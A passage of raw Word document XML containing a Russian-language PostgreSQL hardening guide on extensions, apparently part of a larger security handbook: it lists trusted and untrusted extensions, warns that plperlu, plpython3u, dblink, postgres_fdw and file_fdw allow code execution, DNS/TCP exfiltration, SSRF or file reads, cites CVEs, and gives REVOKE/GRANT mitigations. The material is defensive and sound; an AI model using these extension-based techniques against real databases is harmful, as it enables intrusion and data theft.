        </w:rPr>
        <w:t xml:space="preserve">btree_gin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btree_gist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citext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cube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dict_int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fuzzystrmatch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hstore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intarray</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isn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ltree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pgcrypto</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plpgsql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (всегда trusted), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">seg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tablefunc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tcn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unaccent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uuid-ossp</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xml2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, и несколько других — точный список смотреть через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT name, trusted FROM pg_available_extensions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Untrusted (superuser-only):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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file_fdw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pltcl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (по умолчанию untrusted; trusted версия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pltclu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> отдельно), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">oid2name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pageinspect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pg_buffercache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pgstattuple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pg_walinspect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adminpack</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Trusted ≠ безопасно для всех use cases.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trusted значит «sandboxed настолько, что non-superuser может устанавливать без полного RCE-доступа». Конкретные attack-vectors (CVE-2024-10979 в trusted plperl, R28 trusted extensions как ступень эскалации) показывают, что trusted-статус не индульгенция.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Что НЕ ставить в production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Untrusted с прямым RCE-потенциалом:</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 Perl без sandbox. RCE через любой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE FUNCTION ... LANGUAGE plperlu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (см. 3.7.2). Эквивалент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 Python без sandbox. То же (3.7.3).</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pltclu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Tcl без sandbox.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если плагин реально нужен (типичный случай — научные вычисления, ML-inference) — отдельный кластер только для этого workload, изолированный сетью.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Untrusted с OOB / SSRF / file r/w:</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 TCP/DNS-эксфильтрация (3.6.1).</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 SSRF + DNS-эксфильтрация (3.6.2). USAGE по умолчанию superuser-only, но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доступен любому с superuser или provider-superuser.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file_fdw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — чтение файлов как foreign table.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adminpack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — устаревшее, дает file-r/w API; не использовать.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Trusted, но опасные при misuse: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(trusted) — CVE-2024-10979 (R7) до patch-relise 17.1 / 16.5 / 15.9 / 14.14 / 13.17 / 12.21. Даже после patch — нагрузка постоянного audit.</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xml2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — устаревший XML-парсер с известными vulnerabilities. Использовать встроенный XML вместо.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Что осторожно: trusted, нужны use-case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pg_trgm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — fuzzy text search. Безопасно для read-only текстового поиска; следить, что custom operator-ы не создаются application-роли (R26 CVE-2025-8713).</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hstore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — key-value тип. Безопасно, если не сочетается с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">json_each</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-style dynamic SQL builder-ами.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pgcrypto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — криптографические функции. Безопасно; следить, что random-функции не используются для security-critical purposes (используйте </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">gen_random_uuid()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">random()</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uuid-ossp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — generation UUID. Безопасно. С PG 13+ есть встроенный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">gen_random_uuid()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uuid-ossp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> уже излишен.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Контроль установки</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В PG ≤14 —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для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">untrusted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> требует superuser. Для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">trusted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CREATE на DB. Если application-роль имеет CREATE на DB, она может ставить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">все trusted-расширения</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> без согласования. R28 (trusted extensions as escalation step) — именно про это.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Запретить установку trusted extensions от application</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">REVOKE CREATE ON DATABASE app_db FROM PUBLIC;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">REVOKE CREATE ON DATABASE app_db FROM app_role;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Если нужно — отдельный DBA-flow для CREATE EXTENSION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Application использует уже-установленные.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для managed-провайдеров — список разрешённых extensions определяется провайдером (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rds.allowed_extensions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в RDS параметр-группе, аналоги в Cloud SQL / Azure). По умолчанию список разумный; не добавлять в allowlist без обоснования.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Контроль USAGE после установки</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">После </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE EXTENSION dblink</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> USAGE на функции расширения автоматически выдаётся </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это сделано для удобства, но открывает 3.6.1 для любой роли:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- После CREATE EXTENSION:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT proname, proacl FROM pg_proc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE proname LIKE 'dblink%' AND proacl IS NOT NULL;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- proacl будет показывать =X/postgres → PUBLIC has EXECUTE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigation — REVOKE EXECUTE с PUBLIC, GRANT только конкретным admin-ролям:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">REVOKE EXECUTE ON ALL FUNCTIONS IN SCHEMA public FROM PUBLIC;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Точечно — что разрешено application:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT EXECUTE ON FUNCTION public.gen_random_uuid() TO app_role;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Аналогично для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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">REVOKE USAGE ON FOREIGN DATA WRAPPER postgres_fdw FROM PUBLIC;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER DEFAULT PRIVILEGES</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Чтобы новые объекты автоматически получали правильный ACL — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
